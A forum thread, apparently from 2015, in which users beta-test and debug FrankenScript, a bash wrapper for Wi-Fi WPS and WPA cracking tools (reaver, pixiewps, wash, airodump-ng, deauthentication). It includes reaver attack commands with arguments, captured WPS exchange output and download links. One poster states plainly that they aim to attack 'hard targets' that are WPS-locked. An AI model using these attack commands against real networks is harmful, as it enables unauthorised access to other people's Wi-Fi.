[P] PKE: 2f:5c:5b:e6:52:8d:63:09:e0:d3:20:0d:8f:e8:70:c5:a6 :06:25:d9:15:bc:2f:63:6c:11:29:f4:28:e6:7d:8d:e8:f 7:f0:d8:0a:96:f6:1e:ea:fd:b1:7b:05:a2:ff:eb:e7:5d: cd:05:c1:5d:5c:0f:2c:86:1b:76:d0:97:9d:f1:b2:bc:30 :49:05:bb:77:8c:ff:d1:89:5b:3f:9c:71:a1:40:1b:7a:9 a:69:87:fc:34:5a:9f:2c:48:9f:97:f3:e4:8c:c2:91:9f: a9:c5:3d:75:8a:28:ab:a4:51:76:6d:a3:e7:33:bc:8f:2e :9b:30:64:fe:9c:e1:e0:d8:f4:ac:48:88:e7:34:e7:87:f 7:8d:ca:b6:18:b1:28:8e:20:8a:d7:77:9d:4b:05:e7:29: e4:06:0c:b8:81:af:8a:cc:11:be:72:be:ba:ee:1a:f5:58 :eb:d4:ee:5b:52:e4:9a:7e:91:ce:7f:49:2f:46:9e:c3:8 6:bf:5c:75:34:1a:1b:74:f9
[P] WPS Manufacturer: Cisco
[P] WPS Model Number: 123456
[+] Received M1 message
[P] AuthKey: 9c:fa:0e:5c:e6:81:9f:8c:16:22:da:d9:38:4c:b1:8a:cd :62:b6:39:c7:5f:6f:dd:70:56:38:bd:99:dc:38:9d
[+] Sending M2 message
[P] E-Hash1: 1e:6d:d4:e6:57:03:57:05:a0:7a:73:7c:14:21:91:ea:a1 :94:7f:d1:81:12:7e:3c:6e:cc:6f:4f:c7:a1:aa:56
[P] E-Hash2: 16:90:6b:e9:8b:ca:d8:c6:83:f1:34:fe:92:46:84:1b:35 :c4:08:bb:39:a4:21:2c:c0:c5:1d:b2:97:9a:03:3c
[+] Received M3 message

Script (reaver) displays different essid when attacking target on the (attack screen)........
Thru me off for a sec.

@ nuroo

I'm not sure what the problem is at the moment, but i'll look into it asap.
Is "[2] = Reaver + Pin Generators (Fixed Arguments)" the only one that has that problem?, or does the essid change on other attack options too?.

I'll check and report back, that was the first attacks i've tried. Already attacked the easy targets. Looking to your script to go after hard targets that are wps locked and have rate limiting and such.

Ok kool, you can use the custom wps attack option if you want to use advanced arguments.
I won't be adding any mdk3 router reset options as I think it causes too many problems.

@ nuroo

I looked through FrankenScript and tested it several times but couldn't reproduce the issue you had, I'm guessing it might be a reaver problem or maybe a problem with your kali installation.

@ everyone

Has anyone else had the same issue as nuroo?.
Has anyone used the same settings as nuroo but didn't have an issue?.

Please leave some feedback. :-)

I'll try on another computer, different usb wifi card. i am a noob its entirely possible my error.

Hey! I've been giving it a spin and here are some observations..

1. overall I think it's a great FS release. Packaging is good and the new 'portable' installation is great! Download was horrific, though it IS FrankenScript after all. lol

2. you are killing me with these confirmations..

Multiple wlan devices were detected:

1: wlan0 Intel 2230 iwlwifi - [phy0]
2: wlan1 Atheros AR9271 ath9k - [phy1]

Input the number of the device you want to use: 2

You've chosen to use wlan1, is this correct? y/n:

One monitor mode interface was detected:

1: mon0 Atheros AR9271 ath9k - [phy1]

[1-99] = Selects An Interface
[c] = Creates A New Monitor Interface
Input your choice: 1

You've chosen to use mon0, is this correct? y/n:
we are not launching a rocket into space here Slim. Just doin network vulnerability assessments ;)

3. I did not notice what nuroo has reported, though I had some weird stuff happened on a certain AP..

############################## Scan Results ##############################

1: WPS Locked ESSID BSSID RSSI Version Channel
2: TelecenXXX-XXXX ---------------------------------------------------------------------------------------------------------------
3: ValenXXXX XX:XX:XX:XX:XX:XX 00.dBm WPS-Locked-Yes Channel-2
4: MARTXX_Network XX:XX:XX:XX:XX:XX 00.dBm WPS-Locked-No Channel-6
5: SkynetCisXXXX XX:XX:XX:XX:XX:XX 00.dBm WPS-Locked-No Channel-9


################################################## ########################
# [1-99] = Select A Target # [i] = iw dev scan (WPS WPA/WPA2 WEP) #
# [p] = Proceed To Attacks # [w] = wash scan (WPS) #
# [d] = Delete A Target # [a] = airodump-ng scan (WPA/WPA2 WEP) #
# [m] = Return To The Main Menu # #
################################################## ########################

Please choose an option:

4. Where is Bully??


[1] = Reaver.t6x + Pixiewps (Fixed Arguments)
[2] = Reaver + Pin Generators (Fixed Arguments)
[3] = Reaver (Fixed Arguments)
[4] = Reaver + Pin Generators (Custom Arguments)
[5] = Custom Attack
[p] = Proceed To Attack The Next Target

Please choose an option:


5. 2 and 5 are the same.


Reaver Versions.
################

1: reaver.fork.rev8.64bit
2: reaver.kali.installed.64bit
3: reaver.t6x.rev51.64bit
4: reaver.v1.3.64bit
5: reaver.v1.4.64bit

Please choose a version of reaver to use:



6. why is the -p argument there by default?


Attack Arguments:
reaver.fork.rev8.64bit -i mon0 -c 2 -b XX:XX:XX:XX:XX:XX <CustomArgumentsHere> -p -vv

Please input reaver arguments: -vv



Chosen Attack Arguments:
reaver.fork.rev8.64bit -i mon0 -c 2 -b XX:XX:XX:XX:XX:XX -vv -p

Are the chosen arguments correct? y/n:

Hey! I've been giving it a spin and here are some observations..

1. overall I think it's a great FS release. Packaging is good and the new 'portable' installation is great! Download was horrific, though it IS FrankenScript after all. lol

2. you are killing me with these confirmations..


we are not launching a rocket into space here Slim. Just doin network vulnerability assessments ;)

3. I did not notice what nuroo has reported, though I had some weird stuff happened on a certain AP..


4. Where is Bully??



5. 2 and 5 are the same.



6. why is the -p argument there by default?

1) All the adverts and that stupid .exe **** is nothing to do with me or FrankenScript, most people know FrankenScript is a bash script and not an exe file. LOL

2) C'mon man you only have to confirm them once, dont keep going back to the main menu and you wont have confirm them anymore. LOL
I like it that way cause I use multiple wifi adapters and I often keep choosing the wrong one.

3) Are you saying some of the access point details were missing?.

4) I left Bully out cause it only worked for me once, I might add it again at some point.

5) Hasn't the kali version of reaver been modified?, reaver.v1.4 is unmodified.

6) Its there cause its a fixed argument attack, its mean't to help to avoid lockouts or something like that.
If the -P argument is an issue for you, you can use the custom options, that's why the custom option is there. LOL

1) still an horrific and traumatizing experience. I'm still shaken.

2) I like it that way cause I use multiple wifi adapters and I often keep choosing the wrong one.
Well, not exactly our problem is it? We (consumers) demand that you (monster creator) take the **** thing out! It's redundant for us Professionals that can actually select the right dongle the first time. Petition pending.

3) just on this access point, there was no info what so ever, and when choosing that particular AP, FS went right back to the Scan Results. Don't take any actions though, that's a very strange AP. Just thought I'd report it anyway.

4) Bring it back asap. Bully is a very nice alternative. No reason to can it.

5) hmm don't know. Anyways it is not causing any prbs, and if they ever change the reaver version from 1.4 to something else, then we'll still have 1.4 separately, so leave it like that. I didn't say anything.

6) oki, but I think the user can type -p Just saying.

Anyways luv that version! :D

1) still an horrific and traumatizing experience. I'm still shaken.

2) I like it that way cause I use multiple wifi adapters and I often keep choosing the wrong one.
Well, not exactly our problem is it? We (consumers) demand that you (monster creator) take the **** thing out! It's redundant for us Professionals that can actually select the right dongle the first time. Petition pending.

3) just on this access point, there was no info what so ever, and when choosing that particular AP, FS went right back to the Scan Results. Don't take any actions though, that's a very strange AP. Just thought I'd report it anyway.

4) Bring it back asap. Bully is a very nice alternative. No reason to can it.

5) hmm don't know. Anyways it is not causing any prbs, and if they ever change the reaver version from 1.4 to something else, then we'll still have 1.4 separately, so leave it like that. I didn't say anything.

6) oki, but I think the user can type -p Just saying.

Anyways luv that version! :D

Ok I'll take out the confirmation options for the interfaces selection, and I'll try and add Bully again at some point.
The whole point of the fixed options is to avoid typing and remembering commands, if you can remember the commands and you want to use different commands then the custom option might be better suited to your needs.

I think the issue regarding the missing acess point details is due to the wash scan.
Does the issue happen all the time?.
Does it only happen on the first line?.

2) I was thinking that maybe a simple 'go back' option might solve it for all...


Multiple wlan devices were detected:

1: wlan0 Intel 2230 iwlwifi - [phy0]
2: wlan1 Atheros AR9271 ath9k - [phy1]



One monitor mode interface was detected:

1: mon0 Atheros AR9271 ath9k - [phy1]
2: go back

3)
Does the issue happen all the time?. Yes
Does it only happen on the first line?. No


7. not too crazy about the new handshake routine. It was better before, where I could choose the number of Deauth packets. Plus now I don't see what is going on when I start the Deauth process.


Deauthentication Options:

[1] = Deauthenticate All Connected Clients
[2] = Deauthenticate A Specific Client
[3] = Procced To Attack The Next Target

Please choose an option:
then..
Validate Handshake Options:

[1] = Cowpatty Handshake Validation
[2] = Pyrit Handshake Validation
[3] = Proceed Without Validating

Please choose an option:


but no results are shown.

It was better before, at least I could tell what was the problem. Now is it because of a bad handshake or no handshake at all ?? No clue.



Thanks for implementing [Ctrl]+[c]. Things are faster now and operations alot more instinctive. Cheers!

8. I tried [1] = Reaver.t6x + Pixiewps (Fixed Arguments) and I won't go into details as I never had much luck with that new attack, but reaver goes into a endless loop with no way of terminating that process. When I [Ctrl]+[c] it, reaver starts all over again. I have to shut down that window to end it, and restart FS.

For the rest of the Pixiewps functionality, I will leave it to someone that actually knows about it to give you feedback ;)

8. I tried [1] = Reaver.t6x + Pixiewps (Fixed Arguments) and I won't go into details as I never had much luck with that new attack, but reaver goes into a endless loop with no way of terminating that process. When I [Ctrl]+[c] it, reaver starts all over again. I have to shut down that window to end it, and restart FS.

For the rest of the Pixiewps functionality, I will leave it to someone that actually knows about it to give you feedback ;)

That's whats meant to happen.
Reaver is meant to loop through all the pixie arguments until it has either got the pin or until all the pixie arguments have been tried, it should then return back to the wps attack menu.
I've already added options to quite the attack in the next version.

Regarding the handshake.
You should see in the airodump-ng window if you've captured a handshake or not, and you should only get the Validate Handshake Options if you've captured a handshake.
If you don't get a handshake you'll be taken back to the deauth option menu.

This is what you should see if you get a handshake:

"Validate Handshake Options:

[1] = Cowpatty Handshake Validation
[2] = Pyrit Handshake Validation
[3] = Proceed Without Validating

Please choose an option: "

If you validate the handshake and its good you'll be presented with something like:

"Handshake capture file will be coppied to Directory/Captures/AP-Name

Press [Enter] to continue."

If the handshake is bad you'll be taken back to the deauth option menu.

Regarding the missing access point details.
I think the problem might be something to do with how I split and merged the scan results, I think I might have to rewrite the wash scan function AGAIN.

ok, but I really liked the handshake routine in the previous version. I don't think that automating things to the point of not having Deauth packets option is the way to go. Let FS do most of the work, but let the user some room to try different things. 'Artificial intelligence' and automated functions are very tricky. As an example, just use MS Word with its auto-correct functions, and that thing is dumb as a stick and counter productive.

I would focus on the basic premise of FS "saving the user time" and "reducing user input errors", rather than automating attacks. They seem to be one and the same thing, but there is a big difference between both philosophy. One eliminate redundant tasks and human error, the other limits choices and may lead to failure. Big difference between the two.

Let me know if you want me to test anything, except the Pixiewps attack, which I don't understand, even when automated :p

I may be doing something wrong. This is what happened:

Script (reaver) displays different essid when attacking target on the (attack screen)........
Thru me off for a sec.

(reaver) displays different essid: Confirmed



@ nuroo

I'm not sure what the problem is at the moment, but i'll look into it asap.
Is "[2] = Reaver + Pin Generators (Fixed Arguments)" the only one that has that problem?, or does the essid change on other attack options too?.

No, I picked the first option, Pixiewps.




7: navar 64:66:B3:XX:XX:XX 00.dBm WPS-Locked-No Channel-6
8: Luis 20:AA:4B:XX:XX:XX 00.dBm WPS-Locked-No Channel-11<----my target.



Reaver.t6x + Pixiewps Fixed Attack Arguments:
reaver.t6x.rev51.64bit -i mon0 -c 11 -b 20:AA:4B:XX:XX:XX -a -P -K 1 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 20:AA:4B:XX:XX:XX
[+] Associated with 20:AA:4B:XX:XX:XX (ESSID: navar)<---wrong essid!!
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START req

last thing I wanna do is give erroneous errors 4 u to chase, glad someone else confirmed this.

and thank you for picking up the slack! I might never have seen it. Too weird of a bug to be easily noticeable. Thanks!!

ps: if you have time nurroo, to test the Pixiewps option. I'm clueless about that attack and wouldn't know if it works or not. So if you had success with the original Pixie attack on a certain AP, could you test FrankenScript on that same AP to confirm that the Pixiewps option works?

It would be my honor and pleasure. I'll do it tonight.

ok thx! Just wait for further word from the monster maker in case he wants you to test a new FS version. Don't want you to waist your time with a faulty version. Cheers!

@ Slim,

yep, the results are completely out-of-wak. Not just the essid.

Scan 1:

6: Luis C0:4A:00:XX:XX:XX 00.dBm WPS-Locked-No Channel-11

Scan2:

5: Luis 20:AA:4B:XX:XX:XX 00.dBm WPS-Locked-No Channel-11

When the truth is:

root@Linksys:~# wash -i mon0

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID-----------------------------Channel----------------RSSI WPS Version WPS Locked ESSID


00:23:69:XX:XX:XX -----------6----------------00 1.0 No Luis




also you noticed that FS uses the Wash that is installed in Kali, and not the one in the FS folder? Maybe it's noting, just thought I'd point that out.

Ok, so just to confirm the outstanding errors are:

1) wash scan access point details are messed up?.
2) Reaver displays the wrong ESSID?.

Is this correct?, or did I miss something?.

I may be doing something wrong. This is what happened:


MAC address for wlan2:
Permanent MAC: xxxxxxxxxx (xxxxxxxxx, xxxxx.)
Current MAC: xxxxxxxxx:c5:fc:f9 (unknown)

MAC address for mon0:
Permanent MAC: xxxxxxxxxx (xxxxxxxxx, xxxxx.)
Current MAC: xxxxxxxxx:c5:fc:f9 (unknown)

Target Details: "HAR0000000" 00:00:00:7D:B6:D0

Possible WPS Pins: 82388003 57952154 82109011 65949474

[1] = Reaver.t6x + Pixiewps (Fixed Arguments)
[2] = Reaver + Pin Generators (Fixed Arguments)
[3] = Reaver (Fixed Arguments)
[4] = Reaver + Pin Generators (Custom Arguments)
[5] = Custom Attack
[p] = Proceed To Attack The Next Target

Please choose an option:

Picked 2

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:00:00:7D:B6:D0
[+] Associated with 00:00:00:7D:B6:D0 (ESSID: We hear you 0000000000)
[+] Trying pin 82109011
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 77:58:36:c7:b0:f2:74:ee:23:21:f2:5e:a5:b1:b4:46
[P] PKE: 2f:5c:5b:e6:52:8d:63:09:e0:d3:20:0d:8f:e8:70:c5:a6 :06:25:d9:15:bc:2f:63:6c:11:29:f4:28:e6:7d:8d:e8:f 7:f0:d8:0a:96:f6:1e:ea:fd:b1:7b:05:a2:ff:eb:e7:5d: cd:05:c1:5d:5c:0f:2c:86:1b:76:d0:97:9d:f1:b2:bc:30 :49:05:bb:77:8c:ff:d1:89:5b:3f:9c:71:a1:40:1b:7a:9 a:69:87:fc:34:5a:9f:2c:48:9f:97:f3:e4:8c:c2:91:9f: a9:c5:3d:75:8a:28:ab:a4:51:76:6d:a3:e7:33:bc:8f:2e :9b:30:64:fe:9c:e1:e0:d8:f4:ac:48:88:e7:34:e7:87:f 7:8d:ca:b6:18:b1:28:8e:20:8a:d7:77:9d:4b:05:e7:29: e4:06:0c:b8:81:af:8a:cc:11:be:72:be:ba:ee:1a:f5:58 :eb:d4:ee:5b:52:e4:9a:7e:91:ce:7f:49:2f:46:9e:c3:8 6:bf:5c:75:34:1a:1b:74:f9
[P] WPS Manufacturer: Cisco
[P] WPS Model Number: 123456
[+] Received M1 message
[P] AuthKey: 9c:fa:0e:5c:e6:81:9f:8c:16:22:da:d9:38:4c:b1:8a:cd :62:b6:39:c7:5f:6f:dd:70:56:38:bd:99:dc:38:9d
[+] Sending M2 message
[P] E-Hash1: 1e:6d:d4:e6:57:03:57:05:a0:7a:73:7c:14:21:91:ea:a1 :94:7f:d1:81:12:7e:3c:6e:cc:6f:4f:c7:a1:aa:56
[P] E-Hash2: 16:90:6b:e9:8b:ca:d8:c6:83:f1:34:fe:92:46:84:1b:35 :c4:08:bb:39:a4:21:2c:c0:c5:1d:b2:97:9a:03:3c
[+] Received M3 message

Script (reaver) displays different essid when attacking target on the (attack screen)........
Thru me off for a sec.

Which set of details were correct, were the details reaver used correct?, or were the Target Details: "HAR0000000" 00:00:00:7D:B6:D0 correct?.
Or were they both wrong?.
Oh and did you use the wash scan to get to those options?.

actually Slim I'm starting to wrap my brains around that problem. Confusing as ****.

It's not the wrong essid. It's the wrong AP all together. In other words, all the info in reaver is correct. It's the Scan Results that is messed up. So when you select an AP, it really chooses the one bellow. So when choosing 8 it's choosing 7. Exept that the names are mixedup in the Scan Results.

Do me a favour. Scan with Wash and copy paste the info from that scan. Then use FS to scan with Wash. Then compare the results from the first Wash scan to the Scan Results in FS.

I asked script to attack:
Target Details: "HAR0000000" 00:00:00:7D:B6:00

It attacked:
[+] Associated with 00:00:00:7D:B6:00 (ESSID: We hear you 0000000000)

The bssid was the same, however the essid is wrong.

nuroo can you do the same as I asked Slim to do? Scan with Wash first > copy those results > FS > Scan results > compare both.

Thanks!

Ok Done.... Quest is correct.

The scans from wash by command line and wash from frankenScript launched are both correct.
However how the script interprets the results is off by 1 line. So if you choose for instance 3, it attacks the next one instead.

great I won't have to sign up for the nut house just yet ;)

So it's really the Scan Results in FS that are offset by 1 line.

Ok I'm fairly sure I can fix the wash scan issue, but the wrong ESSID in reaver beats the **** out of me.
The reaver issue is really strange cause FrankenScript doesn't supply reaver with an ESSID, reaver chooses the ESSID.
So there must be a problem with reaver (Possible it might have something to with the location its being executed from), or your kali installation.

I'm still adding things to FrankenScript, but I think I might upload what I have so far, that's after I fix the wash scan issue. LOL

Slim, forget about the wrong essid. That is not the problem as explained in previous posts.

Just run Wash by its self, leave that window open then > run FS and compare the Scan Results whit the Wash window. You will see for yourself what the problem is.

Here's the latest FrankenScript, Updated 29th April 2015

FrankenScript_Portable.29th.April.2015.tar.gz
https://www.mirrorcreator.com/files/0S9GAICA/FrankenScript_Portable.29th.April.2015.tar.gz_link s

Slim, forget about the wrong essid. That is not the problem as explained in previous posts.

Just run Wash by its self, leave that window open then > run FS and compare the Scan Results whit the Wash window. You will see for yourself what the problem is.

I don't have the issue you're having, everything works perfect for me.
I think you really need to explain to me what the problem is with as much detail as possible.

Here's the latest FrankenScript, Updated 29th April 2015

FrankenScript_Portable.29th.April.2015.tar.gz
https://www.mirrorcreator.com/files/0S9GAICA/FrankenScript_Portable.29th.April.2015.tar.gz_link s

The problem is the Scan Results is FS. Nothing else.

After the Wash scan in FS, the Scan Results are all messed up.

The wrong essid is shown with the rest of the information of the AP above it.

So when the user select 7 on the Scan Results list, FS really picks 6.

So it appears as though it's the wrong essid in reaver, but it is not. It is however the wrong AP.

and this is the direct download for FrankenScript_Portable.29th.April.2015.tar.gz
5,7MB (5,65MB)

http://rghost.net/download/8PTsj4Zlm/8297de3c795b6b553227a5f964d4c5324a4189c4/FrankenScript_Portable.29th.April.2015.tar.gz

exact same issue with FrankenScript_Portable.29th.April.2015

Here is a clue: The Scan Results window is way too large. It covers my monitor's wit. nuroo might confirm that.

Really Slim, try to reproduce it on your comp, or on another comp, because otherwise it's not possible to explain. Go to an Internet place with your USB pendrive and USB adapter > install FS, and run it. You will then see what we see.

560

here is a screenshot. Compare the Wash window with the Scan Results.

560

here is a screenshot. Compare the Wash window with the Scan Results.

Yeah I see what you mean now, I'll fix it and upload it later.

Thank you!!

It seems as though, the first AP result being messed up, it pushes the rest of the data offset.

So if you fix the first AP result, the rest will fall into place(?)

oh and there's a new reaver-wps-fork-t6x from 15hrs ago.

https://github.com/t6x/reaver-wps-fork-t6x

oh and there's a new reaver-wps-fork-t6x from 15hrs ago.

https://github.com/t6x/reaver-wps-fork-t6x

Already got it, I updated it using FrankenScript. :-) LOL

Can you do the following in FrankenScript.sh:

1) Change lines 1021,1022,1023.

FROM:

rm $DIR/TempFolder/SSIDList.txt &> /dev/null
rm $DIR/TempFolder/OtherDetailsList.txt &> /dev/null
rm $DIR/TempFolder/WashScan.txt &> /dev/null

TO:

# rm $DIR/TempFolder/SSIDList.txt &> /dev/null
# rm $DIR/TempFolder/OtherDetailsList.txt &> /dev/null
# rm $DIR/TempFolder/WashScan.txt &> /dev/null

2) Browse to FrankenScripts temp folder and compare the following 3 files against each other:
eg: the ESSID on line 1 in SSIDList.txt should match with the details on line 1 in OtherDetailsList.txt

SSIDList.txt
OtherDetailsList.txt
ScanResults.txt

Does the lines in files SSIDList.txt & OtherDetailsList.txt match?.
Are all the details correct in ScanResults.txt?.

561

1) I opened FrankenScript.sh and Copy/Paste lines 1021,1022,1023, as indicated above. Then saved.

ran FS, and opened the Temp folder. New files appeared there.

2) here are the results in the pic.

PS: all the XX you see in the pic are my edit.

561

1) I opened FrankenScript.sh and Copy/Paste lines 1021,1022,1023, as indicated above. Then saved.

ran FS, and opened the Temp folder. New files appeared there.

2) here are the results in the pic.

PS: all the XX you see in the pic are my edit.

Ok, so are the details in ScanResults.txt correct?, thats excluding the first and last lines.

no they are not. They are all offset by one line. The essid does not match the rest.

562

and here is a pic of my FS.sh to remove all doubts.

562

and here is a pic of my FS.sh to remove all doubts.

Ok try this one, if this one dont work for you I'm gonna go and hang myself. LOL

https://www.mirrorcreator.com/files/8X65LTXY/FrankenScript_Portable.29th.April.2015.v2.tar.gz_l inks

Please let me know asap so I can update the first page.

what's your favourite color? White rope, black rope, blue rope? :p

now the attacks don't work and everything is way offset. Will post a pic later.

563

that is what I see. The bssid does correspond to the essid, but everything is messed up, and when selecting any target, the attacks don't work. It goes right back to the Scan Results, as seen in the pic. It's actually worst than before.

How can you get different results than this on your comp?? That's what I'd like to know.

How can you get different results than this on your comp?? That's what I'd like to know.

Have you modified your kali install in any way?.

Ok this is bugging me now??, try this one.

https://www.mirrorcreator.com/files/FS0VKPRC/FrankenScript_Portable.29th.April.2015.v3.tar_0.gz _links

Check the ScanResults.txt file in the TempFolder and let me know if the details and evrything is correct.

well maybe we better wait for more feedback before doing anything else?

Of course I have to modify my Kali install like everybody else. But I don't see what maybe causing this.

Is that good?
https://www.mirrorcreator.com/files/FS0VKPRC/FrankenScript_Portable.29th.April.2015.v3.tar_0.gz

what's that _0.gz ? Are you trying to make my comp explode at a distance?

well maybe we better wait for more feedback before doing anything else?

Of course I have to modify my Kali install like everybody else. But I don't see what maybe causing this.

Is that good?
https://www.mirrorcreator.com/files/FS0VKPRC/FrankenScript_Portable.29th.April.2015.v3.tar_0.gz

what's that _0.gz ? Are you trying to make my comp explode at a distance?

No thats not what I uploaded, I wouldn't open or run that if I was you. lol
The upload must have got corrupted some way

Here you go, try this one:
Click the big orange button at the top right of the page.
http://www67.zippyshare.com/v/iGUAkXKn/file.html

no it's just that you tared it twice, so I had to decompress it twice.

No difference with that version than the one before. Exactly the same problem.

Did you really upload the right version?

no it's just that you tared it twice, so I had to decompress it twice.

No difference with that version than the one before. Exactly the same problem.

Did you really upload the right version?

Just wanted to make sure were both using the same version. lol
Now check the ScanResults.txt file in the TempFolder, are all the details correct and is everything lined up correctly?.

and btw Slim, everything is perfect with the airodump Scan Results. So it's really a format problem with the Scan Results from wash only.

What is the big difference in format between the two in FS?

Just wanted to make sure were both using the same version. lol
Now check the ScanResults.txt file in the TempFolder, are all the details correct and is everything lined up correctly?.

564

no, and it's getting worst by the minute. I want my money back!.. oh wait :o

xD

564

no, and it's getting worst by the minute. I want my money back!.. oh wait :o

xD

I think i might be the paste command I used to merge the files side by side.

hmm? You lost me there.

hmm? You lost me there.

Can you compare the files Wash_Network_Scan-1.txt & Wash_Network_Scan-2.txt side by side to see if that information lines up correctly.

where are those files?

Slim, we should both see the same results. This is insane. Get someone else to confirm that bug or confirm that there is no bug. Then we can be fixed as to which machine tells the truth. Yours or mine.

Then, whoever has the faulty installation, will have to reformat and reinstall. Because right now, it's running round in circles.

If someone willing to try and give feedback please do so.

Slim, we should both see the same results. This is insane. Get someone else to confirm that bug or confirm that there is no bug. Then we can be fixed as to which machine tells the truth. Yours or mine.

Then, whoever has the faulty installation, will have to reformat and reinstall. Because right now, it's running round in circles.

If someone willing to try and give feedback please do so.

I've given up asking people for feedback cause nobody ever bothers too.

In FrankenScript change the following lines: 1021, 1022, 1023, 1024

FROM

# rm $DIR/TempFolder/Wash_Network_Scan.txt &> /dev/null
# rm $DIR/TempFolder/Wash_Network_Scan-1.txt &> /dev/null
# rm $DIR/TempFolder/Wash_Network_Scan-2.txt &> /dev/null
# rm $DIR/TempFolder/WashScan.txt &> /dev/null

TO

# rm $DIR/TempFolder/Wash_Network_Scan.txt &> /dev/null
# rm $DIR/TempFolder/Wash_Network_Scan-1.txt &> /dev/null
# rm $DIR/TempFolder/Wash_Network_Scan-2.txt &> /dev/null
# rm $DIR/TempFolder/WashScan.txt &> /dev/null

Then check the TempFolder for the files I mentioned.

all lines correspond between all three files Wash_Network_Scan.txt, Wash_Network_Scan-1.txt, Wash_Network_Scan-2.txt, and nothing seems offset.

all lines correspond between all three files Wash_Network_Scan.txt, Wash_Network_Scan-1.txt, Wash_Network_Scan-2.txt, and nothing seems offset.

Ok now were getting closer to the problem.
So those 3 files were ok but ScanResults.txt is still messed up, Is this correct?.

one thing does not line up, vertically. There is a space before the lines in Wash_Network_Scan-2

565

isn't that enough to trow the scrip off? These dotted lines appear twice in the Scan Results.

Ok now were getting closer to the problem.
So those 3 files were ok but ScanResults.txt is still messed up, Is this correct?.

Yes, nothing has changed from the last pic of the Scan Results.